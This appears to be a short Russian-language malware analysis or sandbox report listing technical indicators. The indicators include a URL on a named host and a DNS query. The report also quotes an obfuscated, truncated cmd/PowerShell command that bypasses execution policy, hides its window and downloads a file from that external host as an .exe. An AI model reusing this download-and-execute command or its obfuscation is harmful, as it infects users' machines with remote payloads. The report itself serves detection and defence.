Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWE^RsHE^l^l.exe^ -EXEcuT^i^ONp^oLiCY ^BYpA^sS^ -No^Prof^IL^E -^Win^DoW^s^t^y^lE^ HidD^En^ (N^Ew^-o^b^JE^c^t^ ^S^YSTe^M.nEt.weB^cLIen^T).dOW^N^L^oAD^fIle^('http://aloepol...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "pOWE^RsHE^l^l.exe^ -EXEcuT^i^ONp^oLiCY ^BYpA^sS^ -No^Prof^IL^E -^Win^DoW^s^t^y^lE^ HidD^En^ (N^Ew^-o^b^JE^c^t^ ^S^YSTe^M.nEt.weB^cLIen^T).dOW^N^L^oAD^fIle^('http://aloepol...' (со скрытым окном)